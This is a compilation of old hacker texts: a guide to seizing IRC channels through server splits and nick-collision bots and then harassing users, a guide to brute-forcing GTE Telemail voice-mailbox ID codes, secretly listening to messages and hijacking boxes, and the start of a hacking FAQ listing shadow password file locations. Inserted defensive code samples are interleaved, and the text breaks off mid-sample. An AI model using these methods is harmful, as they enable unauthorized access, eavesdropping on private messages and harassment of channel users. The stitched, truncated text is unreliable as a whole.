Hacking IRC - The Definitive Guide


Copyright 1996 klider@panix.com

Welcome to Hacking IRC - The Definitive Guide. The purpose of this page, if
you have not already guessed, is to provide what I consider the optimal
methodology for hacking IRC channels. In addition, I list some of the better
channels to hack as well as fun things to do while "owning a channel."

Contents

* Section 1--Why Hack IRC?

* Section 2--Requisite Tools

* Section 3--What It Takes To Gain Control

* Section 4--Link Looker(LL)

* Section 5--Bots and Scripts

* Section 6--Multi-Collide-Bot(MCB)

* Section 7--Pre-Takeover Preparation

* Section 8--Things To Do Once You "Own" the Channel

* Section 9--Best Channels to Hack


Section 1-Why Hack IRC?

I have often asked myself this question and the answers are varied and
numerous. One of the primary reasons for hacking IRC channels is sheer
boredom. However, a multitude of secondary reasons exist. Foremost among
these is the "that asshole op insulted me and/or kicked me and/or banned me
from the channel and I WANT REVENGE!" This is a perfectly valid excuse, and
boredom is not a necessary condition for implementing a takeover of an IRC
channel. Nor is it a necessary condition that the reason you were insulted
and/or kicked and/or banned was because in fact you are an asshole. All that
is necessary is the will, the desire, a bit of skill, and of course the
tools, which conveniently brings me to my next section.

Section 2-Requisite Tools

Any decent craftsman needs a good set of tools and IRC hackers are no
exception. Without the proper tools you are dead in the water. All of the
tools I describe below are available on public ftp sites.

Before I launch into a discussion of what you will need, it is important to
point out that if you are reading this document from your ppp/slip account
you might consider getting a shell account if you are serious about hacking.
Hacking IRC from a slip/ppp account is much more complicated than doing so
from a shell account. There are those who will debate this, but my
experience has shown that mIRC or any of the other shareware IRC programs
for the PC are no match for the speed and ease of use that an IRC shell
script allows for.

Thus the first tool required for hacking is an excellent IRC shell script.
If you have already used IRC via a shell account and are still reading this
document you probably already have a script, which means you are well on
your way! As far as IRC shell scripts go, my personal favorite is LICE,
again available publicly via FTP. Other scripts exist, but the richness and
power of the LICE commands I believe is second to none.

Now while it is possible to stop here and hack ops with just a script, you
would effectively be putting yourself needlessly at a handicap. Therefore I
recommend these additional two tools: 1) Multi-Collide-Bot (MCB) and
2) Link Looker (LL). These two C programs are your infantry and intelligence
respectively. Again both are available via FTP and both are C programs and
therefore need to be compiled.

Section 3-What It Takes To Gain Control

Without going into much detail, clearly in order to effectively gain control
of an IRC channel you must be the only op on your channel. If you are still
clueless at this point, that is to say: you should be the only guy/gal with
the @ in front of your nick. Once you have accomplished this, the channel is
YOURS. Of course, that is until it is taken back or you decide to cease
hacking the channel.

There are a number of ways to effectively gain ops on a channel and I will
start with the simplest, then move to the increasingly more complex and
finesse-laden methods. By far and away the easiest method of gaining ops on
a channel is to ask. You laugh, eh? Well don't. Clearly as hackers grow more
prevalent on IRC the asking method becomes more and more unlikely to
succeed. This is especially true of the bigger and well established channels
that have cultures unto themselves such as #Netsex, #Teensex, #Windows95,
#Bawel, #BDSM, #Blaklife, #Texas, #Hack, and any of the #Warez channels and
a whole host of others. To gain ops in these channels you must become a
channel regular (i.e. one that hangs there frequently and becomes a known
and trusted member of the channel). Since you have neither the time nor the
desire to make friends on the channel you ultimately want to hack ops on,
the asking method is the last thing you want to do on all but the smaller,
more ethereal channels, where you obviously stand a better although still
slim chance of gaining ops through a request. One important exception to the
ask method is through the use of anonirc, which can be used on any channel
but has severe limitations; more on this later. But of course you didn't
come this far to be taught how to ask for ops, so let's proceed with the
next lesson.

Aside from asking there are essentially two other ways of gaining ops. The
first is through splits and the second is through anonirc. The following
discussion mostly relates to splits but I will touch on anonirc briefly at
the end.

What is a split? A split occurs when the IRC server you are communicating on
detaches from the rest of the net. If you are in a channel and by chance the
only one on a particular server that splits away, you will not only find
yourself alone on the channel, but will now have the opportunity to gain
ops. In order to do this you need to leave and rejoin the channel, in which
case you will now find yourself with the little @ in front of your nick.
When your server rejoins you will have ops on the channel. Now you say,
"Wow, that's easy enough". Wrong. More likely than not, especially on a
bigger channel, a number of things are likely to occur that will remove your
op status. Remember now, the goal here is to keep ops so you can "Have Your
Way". Also and more importantly, if you go into a channel and wait around
hoping the server you are on splits, you might grow old and die first.
Therefore, what is a wannabe IRC hacker to do? Link Looker is your answer.

Section 4-Link Looker

Link Looker is a lovely little program that acts as your intelligence
officer. Without getting into the complexities or its mechanics, what it
effectively does is give you a message anytime a particular server detaches
from the net and a message when it rejoins. Is the methodology becoming
clearer now? Yes! That's right! When LL tells you that a server is split,
you connect to that server and join the channel you seek to hack ops on and
hope nobody else split from the channel on that server (if this occurs you
will not get ops). If you find yourself alone, you will have ops and a
fighting chance to gain control of the channel.

It is important to realize that on many channels, just getting ops via a
split and waiting for a rejoin is sufficient for gaining control of a
channel. This is particularly true of small to medium sized channels as well
as channels that are not organized or do not have Bots (more on this later).
You simply wait for the server to rejoin and once the channel is full you
execute your mass deop command (this is on your script and the key element
in getting rid of any other ops) and you will be the only op left. The
channel is yours and go do your thing! On bigger, more organized channels,
things won't be so easy due to the presence of Bots as well as the presence
of scripts used by existing human ops.

Section 5-Bots and Scripts

Bigger, more organized channels inevitably have a Bot (Robot) or multiple
Bots. Bots are essentially souped-up scripts that attempt to maintain ops on
a channel by their continuous presence on channel. Additionally Bots provide
a number of channel maintenance tasks such as opping known members of the
channel (either automatically or through password requests), providing
notes, and other information. Bots however are primarily used for keeping
ops on channel and, depending on the type of Bot, defending against IRC
hackers. Bots come in many varieties and types but the best of them do a
good job of deopping splitters (that's you, silly: you are opped on a split
and when you rejoin the bot will deop you). Not only will Bots deop you;
many of the human ops have scripts (such as LICE) that depending on the
settings employed will deop you as well.

Now with the prevalence of powerful scripts on IRC a recent phenomenon is
the occurrence of the desynch. This is a nasty event that takes place when
you rejoin from a split and your script deops the existing ops and the
existing ops deop you at the same time. What this does is confuse the shit
out of the servers and cause them to desynchronize from one another. This is
to be avoided at all costs. When this happens you will effectively become
desynched from a large portion of the net and most of the channel (depending
on what server you rode in on). What's worse is that you will think you have
ops (which you will for that server) but in reality you won't and you will
be wasting your time. So how, with the prevalence of super Bots and human
ops with scripts, do you take the channel? Using MCB of course!

Section 6-Multi-Collide-Bot(MCB)

Multi-Collide-Bot (MCB) is a powerful tool and your best friend. MCB is an
even lovelier program that creates a clone of a nick you want to kill
(almost always an op on the channel you are trying to hack) on a server that
has split (yes, the one Link Looker informed you of). Basically you feed MCB
the name or names of the nick you want to kill and tell it what split server
to establish those clones on, and upon rejoin: BAM/SMACK/KILL!! Yes, that's
right, the target is thrown out of the channel (losing ops) and must
re-establish a connection with a server to get back onto IRC and into the
channel. So yes, you have figured it out. If you kill all of the ops on a
channel and you ride in on a split you will be the only op in the channel.
Let me assure you there is nothing like seeing the nick kill messages of
the ops you have targeted as you ride in on the split.
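
Added example, not part of the original guide: a small model of why ops gained on a split server and nick collisions staged from one stop working once servers compare timestamps (TS) when the net relinks. Class and function names are hypothetical, the sample channel and clients are constructed, and the TS rules are a reduced form of TS6-style channel and nick collision handling.

```python
"""Netjoin conflict resolution: no timestamps vs. timestamp (TS) rules."""
from dataclasses import dataclass, field


@dataclass
class ChannelState:
    """One side's view of a channel at the moment two net halves relink."""
    ts: int                                   # when this side created the channel
    members: set = field(default_factory=set)
    ops: set = field(default_factory=set)


@dataclass(frozen=True)
class Client:
    nick: str
    userhost: str
    ts: int                                   # when this client took the nick


def merge_without_ts(ours, theirs):
    """Behaviour the guide relies on: op statuses from both sides survive."""
    return ChannelState(min(ours.ts, theirs.ts),
                        ours.members | theirs.members,
                        ours.ops | theirs.ops)


def merge_with_ts(ours, theirs):
    """TS rule: the side holding the older channel keeps its ops."""
    members = ours.members | theirs.members
    if theirs.ts < ours.ts:
        # Their channel is older: our statuses are dropped, theirs accepted.
        return ChannelState(theirs.ts, members, set(theirs.ops))
    if theirs.ts > ours.ts:
        # Their channel is newer (re-created on the split side): the users
        # arrive as ordinary members and their op statuses are ignored.
        return ChannelState(ours.ts, members, set(ours.ops))
    # Equal TS: same channel instance on both sides, statuses are merged.
    return ChannelState(ours.ts, members, ours.ops | theirs.ops)


def resolve_nick_without_ts(existing, incoming):
    """Without timestamps a collision removes every holder of the nick."""
    return []


def resolve_nick_with_ts(existing, incoming):
    """Return the clients that survive when both halves hold the same nick."""
    if existing.ts == incoming.ts:
        return []                             # cannot tell apart: both removed
    older, newer = sorted((existing, incoming), key=lambda c: c.ts)
    if existing.userhost == incoming.userhost:
        return [newer]                        # reconnect: stale older copy goes
    return [older]                            # different user: first holder wins


def demo():
    # Constructed sample: #example has existed on the main net since t=1000.
    main = ChannelState(1000, {"alice", "bob"}, {"alice"})
    # A client creates the empty channel on the split server at t=5000.
    split = ChannelState(5000, {"mallory"}, {"mallory"})
    real = Client("alice", "alice@home.example", 900)
    clone = Client("alice", "clone@shell.example", 5000)
    return {
        "ops_without_ts": merge_without_ts(main, split).ops,
        "ops_with_ts": merge_with_ts(main, split).ops,
        "nick_without_ts": resolve_nick_without_ts(real, clone),
        "nick_with_ts": resolve_nick_with_ts(real, clone),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The result is the same whichever side evaluates the merge, which is also what prevents the desynch described in Section 5: both halves reach the same op list without exchanging competing deops.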

Section 7-Pre-Takeover Preparation

There are a number of things you can do before you attempt to take over an
IRC channel to make things easier and be as well prepared as you can
possibly be.

1) Pre-Attack Observation. Plain and simple, you must know who you are
attacking. One of the most important things you can do as you sit and
observe the channel is to determine which bots and/or human ops are deopping
on rejoins. These are the nicks you want to target first. You will fail if
you don't kill these nicks and rejoin because you are likely to cause a
desynch (discussed above). However, it is essential to make sure you kill
all of the ops. Leaving just one op alive means you have lost that battle
and must now regroup and wait for another split. It is important to watch
out for ops changing their nicks if they detect a split. If they do this,
the mcb you tagged with their nick will be useless to you. The way I prevent
this is to be on both sides of the split. That is, to be opped in the
channel on the split server and have a clone in the channel on the other
side of the split monitoring the goings on, telling you if ops change nicks
or new people are opped (in which case you create a new mcb with their name
on it).

Section 8-Things To Do Once You "Own" the Channel

Once you own the channel, the decision is clearly yours on how you want to
proceed and needless to say the number of things you can do is endless.
However, let me share with you a number of time-tested ideas that are sure
to give you a thrill, not to mention totally piss off the channel you have
now hacked.

The first thing you can do is to taunt the former ops of the channel. That
is to say, they will probably be cursing you and telling you what a loser
you are for hacking the channel. They will say things like "get a life, do
something more productive". Remember, don't take it personally. You have to
keep in mind that it is the former ops who in fact are the ones who need to
get a life, considering the only power they have, or make that had (if you
successfully hacked the channel), was to have ops in the first place. So you
can continue to taunt and if they get really belligerent you can kick them
off the channel. They will undoubtedly come back within a second or two and
then you can say something like, "Now, now, I am in control of the channel
and I will not tolerate such language and behavior. If you are unable to
control yourself I will be forced to ban you." Now this is sure to get some
violent response from the former op, in which case you subsequently kick and
ban them and move on to the next person.

Another thing I like to do is to word ban. This is particularly easy if you
have LICE. What you do is pick a word that, if typed onto the screen by any
of the channel members, will automatically result in you kicking them off
the channel with the reason that the word is banned. This method is
particularly good in channels like #teensex where people are always saying
the word sex, male, female, teen, age, etc. All you do is ban those words
and watch the kicks begin to fly.

Another thing I like to do is moderate the channel. What this does with the
/mode +m command is to make it such that nobody on channel can speak. This
is a particularly good thing to do when many of the channel members are
getting out of hand and you want to make some sort of statement without
anybody interrupting you. Yes, all eyes will be trained on you. If you want
to be really mean, when you are finished hacking the channel, you can leave
it moderated, in which case nobody will be able to speak and the channel is
effectively shut down. Other things to do which are nasty as well are to
kick everybody out of the channel and make it invite only, effectively
shutting it down as well.

Think of your own creative things to do. I would love to hear about them:
email me, and if they are particularly interesting I will include them in
this page with an attribution if you like.

Section 9-Best Channels to Hack

#limbaugh
#rush
#lamerz
#newbies

email klider@panix.com

Hacking GTE Telemail


        Underground America
          proudly presents

      ========================
        HACKING GTE TELEMAIL
             written by
            MASTER MICRO
      ========================


WHAT IS TELEMAIL?
=================
For many years, rich corporate mongers have invested in personal telemail
boxes for their employees. The generic term for this type of messaging system
is a "voice mailbox". It's nothing more than an answering machine with a few
extra frills. The good thing about voice mailbox hacking, is that there are
1-800 access numbers, which makes it easy for anyone who doesn't feel like
phreaking to your number, to leave you a message.

OPERATING GTE TELEMAIL
======================
To play with any voice mailbox, it is usually necessary to have a touch
tone fone. This incorporates the standard 0-9 digits and the two function keys.
The symbol that looks like a tic-tac-toe sign, "#", is called the pound key.
The other is an asterisk, and is called that, or the "star". You will need to
be familiar with those to use this system.
GTE Telemail, like other voice mailboxes, is VOICE. I.e., you don't use
your modem for hacking this, it's all manual (pain in the butt, yes, I know).
If you like, you can try all this out while you are reading the file, just so
that you get used to the service.
The phone number for this service is: 1-800-348-6551. When you first dial
the number, and it answers, you'll hear this: "<Beep><Beep><Beep><Booo> Hello.
You've reached the telemessages service. The person you are calling is
presently unavailable. To leave a message, enter the address of the person you
are calling; or to access your regular message box, enter the pound sign".
Most of the hacking that you are going to be doing is on the "regular
message box". This is where the people get the messages that people have sent
to them. You would dial the pound key after that announcement. To make your
life easier, you never have to wait for those recordings to finish. You can
interrupt the lady only after she has begun speaking, but you can dial the
pound key right after the beeps. After pressing the pound key, you will hear
another recording: "Please enter your id number". It is here that you would
enter someone's id number. You will then hear a short "beep". Another recording
will come on if it is a valid number: "You have XX new messages, and XX saved
messages". New messages are ones that you haven't heard yet, saved messages are
the ones that you wanted to keep for later reading, or rereading.
There are different types of boxes on this service. Some have "Greeting
Messages" and "Bulletins", some have a strange method of picking up messages. I
will go over those now:
If you have messages waiting, you can receive them by dialing "2".
Sometimes, it won't give you that option, so you will have to dial "011" for
your new messages, or "012" for your saved messages. When you are listening to
your messages, you may dial a "2" to pause, and another "2" to continue. A "3"
will rewind the messages a couple of seconds back, and a "4" will fast forward
the message. Usually, if you hit the "4" key twice in a row quickly, it will
jump to the end of the message and beep, giving you a second menu.
After you have heard the message, you are given these options:
022: Reply back to the person
021: Redirect the message
7: Save the message
5: Delete the message
Dialing the asterisk at any point is like an abort command. It usually will
stop what you are doing and go to the last menu before what you are currently
doing. If you dial the asterisk at the top menu, "To get your new messages,
dial 011...etc", you will get a recording that says, "GoodBye", and then be
hung up.


HACKING GTE TELEMAIL
====================
....is a pain, but it works.

The object when hacking these things is to find out as many 6 digit personal
id codes as possible. You see, to send someone a message, that involves a 7
digit code. Since the 6 digit code is easier to get, and gives you more
information, you have to scan through an entire prefix of numbers to get as
many id codes as possible.
All you really need is a touch tone fone, and a notebook. It's handy if
your fone has some kind of memory, and you can recall any number at a single
touch. Like my fone here, there are 12 extra buttons that you can program
numbers into.
First, you have to find out a prefix for Texas. You know, a prefix, the first
three numbers in a seven digit fone number, not counting the area code. There's
lots of ways to do this. You can either whip out your fone book, or dial
"1-214-555-1212" or "1-817-555-1212". Most of the time, you can phreak to those
two numbers from any service. I know that Sprint lets you.
Tear out a separate piece of paper from the notebook, and draw up a chart
that looks similar to this:

0 0 1 2 3 4 5 6 7 8 9
1 0 1 2 3 4 5 6 7 8 9
2 0 1 2 3 4 5 6 7 8 9
3 0 1 2 3 4 5 6 7 8 9
4 0 1 2 3 4 5 6 7 8 9
5 0 1 2 3 4 5 6 7 8 9
6 0 1 2 3 4 5 6 7 8 9
7 0 1 2 3 4 5 6 7 8 9
8 0 1 2 3 4 5 6 7 8 9
9 0 1 2 3 4 5 6 7 8 9

The chart stands for numbers from 00-99. The first row, represents "00-09",
the second row would be "10-19" (understand?). To read it, the number on the
farthest left is the first digit in the number, then you just go from "0-9" on
the rest of the row for the second digit. It's easier than writing out "00-99"
in order.
Now, take the 3 digit prefix in Texas, and add a "0" after it. In other
words, if the prefix you picked was "123" (No, that's not a real working
prefix), then you'd have "1230". If you are using the programmable fone that I
mentioned before, put this four digit number into a key, or somewhere on the
fone that you can retrieve it easily.
Dial up the number (1-800-348-6551), and wait for the
"<beep><beep><beep><boo>", as soon as you hear the last <Boo> sound, hit the
pound key. As soon as the lady begins to speak, hit the key that has those four
numbers programmed into it, or manually dial those four numbers. After that,
dial the two digit number that you get from the chart. This should make 6
digits in all. If it's an invalid code, you will get this recording: "We're
sorry, we are unable to process the id you entered, please try again." As soon
as you hear the lady start to say "We're sorry", hit the asterisk button.
You'll hear two quick beeps. Cross out the number on the chart that didn't
work. For example: You just began the dialing, you picked "123" for a prefix,
and added the "0" on to get "1230". You were starting from the first line of
your chart, which looks like this:
0 0 1 2 3 4 5 6 7 8 9
You would dial the number and everything, press the pound sign, and hit the key
that had the "1230" on it, or if you didn't have that kind of fone, you would
dial the "1230" manually. You would then dial a "00". If that was invalid, and
the recording began saying "We're sorry....", you hit the asterisk, and then
cross out the zero (not the farthest one on the left).
If the code didn't work, you would go on to the next number. In the
example, you would be dialing "01". If the "123001" didn't work, you'd cross
out the "1" and go onto "02".
GTE Telemail only gives you three tries at getting an id code. On the third
try, you will get this kind of recording (which, by the way, you can abort, and
hit "*" where it will just hang up on you): "We are still unable to process
your id. For assistance, please call 800-527-1149. Thank You" <click>.
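
Added example, not part of the original file: the three-tries limit above is counted per call, so it never sees a sweep that spreads its guesses over many calls. The detector below counts distinct failed id codes per source across calls and lists any valid ids the same source reached, so their owners can be given new codes. The log tuple layout, the source labels, the thresholds and the sample log are all constructed assumptions.

```python
"""Cross-call detection of id code sweeps against a voice mailbox login."""
from collections import defaultdict, deque


def longest_sequential_run(ids):
    """Length of the longest run of consecutive numeric ids, in order tried."""
    best = run = 0
    prev = None
    for value in map(int, ids):
        run = run + 1 if prev is not None and value == prev + 1 else 1
        best = max(best, run)
        prev = value
    return best


def detect_id_sweeps(events, window_s=3600, max_distinct_failures=10):
    """Flag sources whose failures, summed over calls, look like a sweep.

    events: time-ordered tuples (epoch_s, source, call_id, entered_id, ok).
    Returns {source: summary} for every source over the threshold.
    """
    recent = defaultdict(deque)     # source -> (time, id) failures in window
    tried = defaultdict(list)       # source -> every id entered, in order
    calls = defaultdict(set)        # source -> distinct call ids
    successes = defaultdict(list)   # source -> ids that were accepted
    first_alert = {}
    for when, source, call_id, entered_id, ok in events:
        tried[source].append(entered_id)
        calls[source].add(call_id)
        if ok:
            successes[source].append(entered_id)
            continue
        window = recent[source]
        window.append((when, entered_id))
        while window and when - window[0][0] > window_s:
            window.popleft()        # forget failures older than the window
        if len({i for _, i in window}) > max_distinct_failures:
            first_alert.setdefault(source, when)
    return {
        src: {
            "first_alert": when,
            "calls": len(calls[src]),
            "longest_run": longest_sequential_run(tried[src]),
            "exposed_ids": successes[src],
        }
        for src, when in first_alert.items()
    }


def constructed_log():
    """Constructed sample: one sweep of 30 ids, one ordinary mistyped login."""
    events = []
    for n in range(30):             # three entries per call, 20 s apart
        entered = f"1230{n:02d}"
        events.append((n * 20, "line-A", f"A{n // 3}", entered,
                       entered == "123017"))
    events.append((100, "line-B", "B0", "456780", False))
    events.append((110, "line-B", "B0", "456789", True))
    return sorted(events)


if __name__ == "__main__":
    print(detect_id_sweeps(constructed_log()))
```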

Now, let's say that you didn't get one of these recordings, but you heard a
short beep after you entered in the whole id. That means you got a working id
code! On your chart, don't cross out the number, but circle it. In the
notebook, write out the entire 6 digit id code.
If there are no messages on the box, just hit the asterisk until you hear
"good-bye", and go onto the next number on your chart. If there ARE messages,
you want to read them without the owner knowing. In some situations, that's
impossible, but just don't kill anybody's messages.
You want to try to keep all NEW messages NEW, so that if the original owner
of the box calls up, he will still have the same message. GTE operators throw
a pissy fit if the messages aren't going through, and they order all of these
conferences with their customers. Anyhow, if there is only 1 new message, after
you've listened to it, press the "*" button, and that will keep the message
new. If there are more than one, press "7" to put the message into the "saved
messages bank" after you have listened to them, except for the last message,
which you can still keep as new by hitting the asterisk.
Reading saved messages is easier because nobody has to know that you did
it. Usually after reading your new messages, the system will say, "beginning
saved messages" if there are any. Otherwise, just dial "012" from the main menu
for the saved messages. Remember to save all of these messages with the "7"
button.
Now, the object here, when listening to all of these messages is to find
out as much information as possible about the owner of that id code, and the
people that are sending the message to that box. Let's say you are listening to
a message, and you hear this: "John, this is Michael". That's great, you would
scratch down "John - Michael" in your notebook right after where you wrote down
that box's id number. This will remind you that John owns that box, and Michael
sent the message to him.
If you EVER hear them giving out the 7 digit address codes over a
telemessagenger, be sure to write that down too. Any other information is
handy, too.

Now, what on earth are you going to do with all of this information? You're
going to set up your own boxes! Or at least take over other people's boxes. The
first method is called "Read and Reply". Let's say, for example, you had one
box, and a message was sent that said, "Hello John, this is Michael.", and on
another box, you heard a message that said, "Hello Michael, this is Judy", you
might have a match. You see, since you now know Michael's box number, and
Michael sent a message to this John dude, all you have to do is go to the first
box and reply to the message that Michael sent, and it will be sent back to
Michael's box.
So, this is exactly what you must do if you think you have a match (I will
use the example above for references to make this easier):
Ex.:
Id Code: 123000 had a message to John, from Michael
Id Code: 123050 had a message to Michael, from Bubba.

Ok, so you think that you have a match. You would go to the box that had the
message >FROM< the guy whose box you know. In other words, you would dial
"12300", and listen to the John/Michael message again. Press the "4" button to
fast forward through the message, until you hear the beep. Dial a "022" to
reply to the message. You would then dial a "1" to begin your message
recording, where you would say the last 3 digits into the phone (in this case,
you would say "000"), and press "5" to end the recording. It will then say "Your
reply has been sent. You may now dial 022 to reply...etc". Just press the
asterisk until it says "good-bye", and call back. When you get on, get onto
the id number 123050, because that's the id that you think is the same that
sent that John dude a message. If there is a new message, with your voice
saying "000" into it, you got it! More on this in a second.
Don't cry if the boxes don't match up and the message doesn't go through.
There is still a chance that there are other people with the same name. Just
set them up the same way. Now, if, when you first listened to the messages on a
box, heard your voice saying three digits, but you never tried matching them
up, then you just got a box! Write down the two numbers together somewhere.

If you have two matches, this is what you do... I am going to use the
examples above with the 123000 and 123050 boxes. Ok, now you have two boxes
that are "linked" through messages. Your next mission is to get both boxes to
have messages from one another that have YOUR voice on it, and to kill all
other messages. In this example, this is what you would do: Get onto the 123000
box and reply to the "from michael" message. For your message, don't say
anything, just have about 7 seconds of silence, and then finally hit "5" to
finish the message. Next, you would go to the 123050 box, and would listen to
the 7 seconds of silence message that you just sent. Reply back to this, and do
the same thing. So now, both boxes have these "7 seconds of silence" or "blank"
messages in their boxes. Next, you would go to both boxes and kill all of the
other messages in the box. Everything, even the "michael" message goes.
You have now seized the box, and it is at your will. You must pick one box
to be your "update" box, and the other to be your "pickup" box. The "Update"
box is the one that will have your greeting message on it, like "You've dialed
Master Micro's box, to send him a message, dial 022 after the tone." The
"Pickup" line is the box that will be used for only YOU, where you read
messages that other phreaks have left you. To set these up, do the following:
Go to the box you picked as your "pickup" line. Read the blank message and
reply to it. For the message, say whatever, like "This is so-and-so's box, dial
022 after the beep to reply". You then dial up the update line, read the
welcome message that you just sent, and hit "7" after listening to it to save
it. You'll hear the blank message somewhere, either as your new or your saved
message. Kill the blank message on the update line. Now, if you ever wanted to
change your greeting message, go to the pickup line, record a new message by
replying to the blank one; go to the update line, and kill the old greeting
that you don't want, and save the new one.
Once you have your box set up, all you have to do is give all your phreak
phriends the address and instructions to the update line. Tell them to save the
messages when they read it, and to reply to it using 022 if they want to send
you a message. Occasionally, check your pickup line for new messages, and kill
them after you have read them just in case the owner of the box catches on and
changes his id code.

The other method to set up boxes is used mainly for setting up codelines, or
other kinds of boxes where you don't want replies, or it is not totally
necessary to have replies. A codeline is a voice box that you have devoted to
telling your phriends new codes, and any other new info. Setting these up is
easy as hell, and you can make as many as you want, but there is a catch. You
must have figured out both the 7 digit address code, and the 6 digit id code
for the same box. Let's say there was a dude named Frank, and his address code
(the number you dial as soon as you get on, instead of dialing the pound key
and id number, to send the guy a message) was "1234567", and his id code was
"098765". First, to find out if the address and the id code are the same, you
do the same method of matching up first names. Call up the telemail service,
and instead of dialing the pound key and everything, dial the 7 digit address
code, and send a message saying something like, "yess umm.. <click>" and hit 5.
They'll think it's a screwed up message that didn't go through if the address
and the id code aren't for the same box. Anyways, after you send the message,
you'll be hung up on by GTE. Just call back, and this time enter the pound and
the 6 digit id code (in this case, 098765). If there is a message that says,
"yess umm.. ", then you got it! The next thing you do is jump up and down and
pop yourself open a brewski.
After you've popped open your brewski, make sure you are still coherent
enough to set up a codeline, or whatever else you want to set up. I was gonna
set up those 1-212-970-XXXX phone sex recordings on a few, because you can set
up as many as you want; just to amuse the kiddies, and show them your power.
Anyhow, whip out your notebook, and pick a box that has no messages in it. If
you don't have any, then pick a box, and go to it, and kill off all of the
messages. Go to that box, and after the recording tells you that you have no
new and no saved messages, you will be given a menu. Dial the address code of
the box that you have the id and address to (in this case, 1234567). Enter a
message, that says anything you want -- if you can't think of anything, just do
the 'ole blank message. Save it and everything. You then dial the asterisk
until you get hung up, and then call back again. This time, enter the id code
of the box that you have both the addr and id to. When you hear the message
that you just sent from the other box, reply to it, and in that message, put
whatever you want into it. After you are done, just kill the message you just
heard, so there is nothing on the box that you have both info for. Now, you can
screw around with the other box that you set up, but try not to have any
messages, or anything screwy on the box you have both things for. If you do,
you're just going to wind up having it dead, so that's my warning. Tell people,
when you give out the other box number, the one you just set up, not to reply
to send you messages.

Ok, now, going back to near the beginning of the file, about talk of the
chart, let's say you went from 00 to 99, and you've filled out your chart. The
prefix you were using was: 1230. You would then change that "0" to a "1". So
your new four number prefix would be 1231. Keep doing this until you are bored,
or you have gone up to 1239. Then, you have to pick a new Texan prefix, and
start with 0 again. Now, that's a lot of numbers...

Also, that 1-800 number is not the only one in the country. There are
several others. There is probably a GTE in lots of the major states. If you
find any new numbers, look for prefixes for THAT state and not Texas. Shit, I
don't even live in Texas. I live in Russia.




"This is Master Micro for the Underground America Codeline............."
Thank You for your support.

Special Thanks to Mr. Xerox - who if I didn't blow school for that day, and he
didn't blow work, would have never found out the formats for GTE Telemail.
Also, because of his board, him and I started hacking and phreaking again, and
without Underground America, I wouldn't be typing this file right now.

DOWNLOADED FROM P-80 SYSTEMS......

Hacking Faq


Psychotic's FAQ
by Virtual Circuit and Psychotic

I. HACKING
* What is hacking?
* How do I crack shadowed passwords?
* How can I tell the difference between an encrypted password and a shadowed password?
* Where can I find the password file if it's shadowed?
* Where is the password file located?
* What is an exploit?
* What are some basic telnet commands?
* How do I get out of the log file?
* What is a DNIC?
* What is an NUA?
* What is a VAX/VMS?
* What is telnet?
* What is an anonymous remailer?
* What is PGP?
* What is a tcp/ip?
* What is a virus?
* What is a trojan?
* What is a worm?
* What do I need to become a hacker?
* What are some common accounts for Novell Netware?
* How can I gain supervisor access to Novell Netware?
* How do I access the passwords for Novell?
* How do I crack a Novell Netware password?
* What are the domain codes?
II. PHREAKING
* What is phreaking?
* How do I start phreaking?
* What are boxes?
* What kind of boxes are there?
* How do I make a box?
* What is a loop?
III. Security
* How do I set up an anonymous FTP server?
* What are some ways that I can secure a network?
* What is a "rainbow book?"
* What is a sniffer?
* What is a firewall?
* How can I use PGP to benefit me?
IV. Group Questions
* What is Psychotic?
* Is Psychotic looking for new members?
* What is Psychosis?
* What is the "Devil's Gateway?"
* Where can I find some good resources on hacking and phreaking?
* Who are all the members in Psychotic?
* What are Psychotic's offered services?

Q. What is hacking?

A. Hacking is the art of breaking into computers to gain knowledge that our society has hidden from us. Hacking is illegal and the government spends lots of money each year to have hackers arrested.....when they should be spending the money on more important issues.

Q. What is a shadowed password?

A. A shadowed password is a cover for the real password file. It shows that the real password is hidden somewhere else.

Q. How do I crack shadowed passwords?

A. Cracking a shadowed password file is impossible. Assuming that you got the password file via anonymous ftp, you should try connecting to port 25 and doing the sendmail bug.

Q. What is the difference between an encrypted password and a shadowed password?

A. An encrypted password is just the real password scrambled and changed. It can be cracked with a password cracker and a word file. A shadowed password hides the encrypted password somewhere other than the etc dir.

Q. Where can I find the password file if it's shadowed?

A.

Unix                     Path                            Token
-----------------------------------------------------------------
AIX 3                    /etc/security/passwd            !
       or                /tcb/auth/files//
A/UX 3.0s                /tcb/files/auth/?/*
BSD4.3-Reno              /etc/master.passwd              *
ConvexOS 10              /etc/shadpw                     *
ConvexOS 11              /etc/shadow                     *
DG/UX                    /etc/tcb/aa/user/               *
EP/IX                    /etc/shadow                     x
HP-UX                    /.secure/etc/passwd             *
IRIX 5                   /etc/shadow                     x
Linux 1.1                /etc/shadow                     *
OSF/1                    /etc/passwd[.dir|.pag]          *
SCO Unix #.2.x           /tcb/auth/files//
SunOS4.1+c2              /etc/security/passwd.adjunct    ##username
SunOS 5.0                /etc/shadow
System V Release 4.0     /etc/shadow                     x
System V Release 4.2     /etc/security/*                 database
Ultrix 4                 /etc/auth[.dir|.pag]            *
UNICOS                   /etc/udb                        *
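
For an administrator, the distinction drawn above between a hash in the passwd file and a token pointing elsewhere is something to audit. The following check is an added example, not part of the original FAQ; the token set, the status names and the sample entries are assumptions constructed for illustration.

```python
import re

# Markers the table above lists in the "Token" column, plus "x".
# A leading "##" is the SunOS C2 adjunct form (##username).
SHADOW_TOKENS = {"x", "*", "!"}
DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")   # traditional crypt(3) output


def classify(field):
    """Classify the second field of a passwd entry."""
    if field == "":
        return "empty"        # account has no password at all
    if field in SHADOW_TOKENS or field.startswith("##"):
        return "token"        # hash lives elsewhere (or account is locked)
    if DES_CRYPT.match(field) or field.startswith("$"):
        return "hash"         # hash sits in a world-readable file
    return "other"            # vendor lock strings such as *LK*


def audit_passwd(text):
    """Return [(lineno, user, status)] for every entry in passwd-format text."""
    results = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 7:
            results.append((lineno, parts[0], "malformed"))
            continue
        results.append((lineno, parts[0], classify(parts[1])))
    return results


def needs_attention(text):
    """Users whose entry exposes a hash, has no password, or is malformed."""
    return [user for _, user, status in audit_passwd(text)
            if status in ("hash", "empty", "malformed")]


# Constructed sample; the hash-looking strings are made up for the example.
SAMPLE = """\
root:x:0:0:root:/root:/bin/sh
daemon:*:1:1::/:
legacy:ab01FAX.bQRSU:500:100:Legacy user:/home/legacy:/bin/sh
guest::501:100::/home/guest:/bin/sh
c2user:##c2user:502:100::/home/c2user:/bin/sh
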